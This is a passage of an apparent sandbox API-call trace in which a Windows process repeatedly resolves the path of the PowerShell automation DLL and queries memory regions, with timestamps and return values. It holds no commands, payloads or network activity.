lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.873] GetLastError () returned 0x0 [0026.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.873] GetLastError () returned 0x0 [0026.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.874] GetLastError () returned 0x0 [0026.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.874] GetLastError () returned 0x0 [0026.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.874] GetLastError () returned 0x0 [0026.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.874] GetLastError () returned 0x0 [0026.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.874] GetLastError () returned 0x0 [0026.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.874] GetLastError () returned 0x0 [0026.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.874] GetLastError () returned 0x0 [0026.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.874] GetLastError () returned 0x0 [0026.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.874] GetLastError () returned 0x0 [0026.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.874] GetLastError () returned 0x0 [0026.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.874] GetLastError () returned 0x0 [0026.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.874] GetLastError () returned 0x0 [0026.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.875] GetLastError () returned 0x0 [0026.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.875] GetLastError () returned 0x0 [0026.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.875] GetLastError () returned 0x0 [0026.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.875] GetLastError () returned 0x0 [0026.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.875] GetLastError () returned 0x0 [0026.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.875] GetLastError () returned 0x0 [0026.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.875] GetLastError () returned 0x0 [0026.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.875] GetLastError () returned 0x0 [0026.875] VirtualQuery (in: lpAddress=0x1cd090, lpBuffer=0x1ce090, dwLength=0x1c | out: lpBuffer=0x1ce090*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.876] GetLastError () returned 0x0 [0026.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.876] GetLastError () returned 0x0 [0026.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.876] GetLastError () returned 0x0 [0026.876] VirtualQuery (in: lpAddress=0x1cd090, lpBuffer=0x1ce090, dwLength=0x1c | out: lpBuffer=0x1ce090*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.876] GetLastError () returned 0x0 [0026.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.876] GetLastError () returned 0x0 [0026.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.876] GetLastError () returned 0x0 [0026.876] VirtualQuery (in: lpAddress=0x1cd090, lpBuffer=0x1ce090, dwLength=0x1c | out: lpBuffer=0x1ce090*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.877] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.877] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.882] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.882] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.882] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.882] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.882] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.882] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.883] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.883] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.884] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.884] VirtualQuery (in: lpAddress=0x1ccecc, lpBuffer=0x1cdecc, dwLength=0x1c | out: lpBuffer=0x1cdecc*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.884] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.885] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.885] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.885] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.885] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x203dc65c, Data2=0x9364, Data3=0x42d1, Data4=([0]=0xbc, [1]=0xf1, [2]=0x19, [3]=0x49, [4]=0x27, [5]=0xf2, [6]=0x6c, [7]=0x77))) returned 0x0 [0026.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdae8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.885] GetLastError () returned 0x0 [0026.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.886] GetLastError () returned 0x0 [0026.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.886] GetLastError () returned 0x0 [0026.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdae8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.886] GetLastError () returned 0x0 [0026.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.886] GetLastError () returned 0x0 [0026.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.886] GetLastError () returned 0x0 [0026.886] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xfc2d08e8, Data2=0x26d6, Data3=0x442f, Data4=([0]=0xad, [1]=0x69, [2]=0xba, [3]=0x4a, [4]=0xb1, [5]=0xa7, [6]=0xd6, [7]=0x6))) returned 0x0 [0026.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdae8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.886] GetLastError () returned 0x0 [0026.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.886] GetLastError () returned 0x0 [0026.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.886] GetLastError () returned 0x0 [0026.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdae8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.886] GetLastError () returned 0x0 [0026.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.886] GetLastError () returned 0x0 [0026.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.887] GetLastError () returned 0x0 [0026.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.887] GetLastError () returned 0x0 [0026.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.887] GetLastError () returned 0x0 [0026.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.887] GetLastError () returned 0x0 [0026.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.887] GetLastError () returned 0x0 [0026.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.887] GetLastError () returned 0x0 [0026.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.887] GetLastError () returned 0x0 [0026.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.887] GetLastError () returned 0x0 [0026.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.887] GetLastError () returned 0x0 [0026.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.887] GetLastError () returned 0x0 [0026.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: 